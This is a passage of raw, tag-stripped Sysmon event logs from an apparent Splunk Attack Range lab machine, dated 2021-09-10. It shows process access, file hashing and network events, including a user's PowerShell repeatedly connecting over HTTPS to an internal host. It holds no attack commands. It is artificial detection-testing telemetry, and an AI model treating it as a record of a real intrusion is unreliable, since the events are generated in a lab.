14:58:17.383{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:17.383{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-7289-613B-29B4-03000000C801}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:17.383{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7289-613B-29B4-03000000C801}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:17.368{B81B27B7-7289-613B-29B4-03000000C801}4780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:17.115{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95CE85873D387BC0E38DA343DE15AE99,SHA256=D74AD29ECDCE0965114EF23A272E62D151BD064879CB18B3F8D28005D40552C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.383{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D394672C56C252C0ABDFBDBB14C4560,SHA256=AE600850D3F80029B4EB098826E6C2014C1DBC3180DD45F7CC52999E219D38B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.383{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BBC13211A091636E55A3DF2DAAEB701C,SHA256=2354834AA2FE3768DF760661C6492E31374D1E82C5D883E0BDF45E2EC0F9B3F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.198{B81B27B7-728A-613B-2AB4-03000000C801}64606176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.136{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51A15D508DB985DA3A2A4AC5347F4F03,SHA256=557D30B3FDB3D208BE12A4DC90D1F091CAA832FF3FE9065ACA3468FDB3D57F21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.036{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-728A-613B-2AB4-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.036{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.036{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.036{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-728A-613B-2AB4-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.036{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.036{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.036{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-728A-613B-2AB4-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:18.015{B81B27B7-728A-613B-2AB4-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035342150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:44.181{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52389-false10.0.1.12-8000- 23542300x800000000000000035342149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:19.182{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C69D342E08D1E9A59C73EE28620207,SHA256=EE13D2C38BF994FEE4674C53431B99E058CEB5F03DD4151DF8EC61C5D5718391,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:20.197{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6276B461767F726CC9343D331A3C1A9D,SHA256=160F9B06F88FE212B3A7F400A73BE12E3154EBF94C7ECE4F7A9436E96128A0BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:21.198{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C2AAC115A374EDE553776249A10901B,SHA256=7F7EDE38B9DFA8D913EBE926CBA6605DE0C58BCAFA30C59616AA89C487CD2DBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:48.111{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52390-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:22.335{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FC3038B2C1B0655318D1202C8F2A3A83,SHA256=C77FCC4252F31C377C6ABF70A3673577448DC58DA08E0A0914B347FC00CE3535,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:22.214{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BECCBB7503F19662DDADFD945A8D3F4,SHA256=8960AB7DECC7C8C14274CB66ECA6933F8714D13547C15323BBFDA7B94FDB613D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:23.231{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E89E2045BB765D89F0DDFD5B68CF805A,SHA256=46B9F2CA894D784A4E82941E1DC9E4AF061FF86CF7B6C6A5E8E52E60EC81F00D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:23.013{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:50.096{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52392-false10.0.1.12-8000- 354300x800000000000000035342159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:49.996{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52391-false10.0.1.12-8089- 23542300x800000000000000035342158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:24.280{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C0F625CC029B5DAB9C14B9FF717EDC6,SHA256=175D68B824031B202BAB2440FCAE91A7BB52E16CAF41B283DC8084D47C23D038,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:25.296{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9BDF79F9E9E3B9DE403DBA9C7B81C8C,SHA256=7CE40F938EA2ABD6EEA7E368D28D402EDCC41A10103708ADED1D131A26849EF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:26.310{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6EF7EF604671B22C43BFFF1FE7A93DB,SHA256=6BFBCB1C129131DFF6ECC580BD9487F992B42B5C18F9056163ABD0B99C59C8FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:27.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=144BA4FED1422C53CB7DA32DC3210882,SHA256=FD57B3F2C39137E979B41A1DAF6A9EC8FD81DA3F27E6A72FE71FB00688271783,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:27.327{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9748E2B82ACAF692581A55A2D96A3265,SHA256=6D6BF9E4CCA71D88270BB8BC0A4BD272F748E3C5BE96A20D7B6A4D59CDC44A0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:28.377{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C966A6E85C84EDB8BE3BBF446E0558,SHA256=B616B3F95A45811B1724E72C7F6B2BBA3FFA3920D2C9C01BC97A6C957FD8AD8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:53.125{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52393-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:29.392{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D1D0DCD8CEE1A58494FFF091246437,SHA256=DF8C63C6EA7E7C4C7CD10D5528D1ACE2C5B1F6AA4DAA98E201999A7E51049FCF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:30.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C9EB4F8E5A32B4D858CB14AE0981F35,SHA256=7BD03D41E963443DB6AA9D4DA22358B577802DEE999A3F5C627806DAD39D8E2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:55.144{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52394-false10.0.1.12-8000- 10341000x800000000000000035342187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.927{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7297-613B-2CB4-03000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.909{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-7297-613B-2CB4-03000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:58:31.909{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 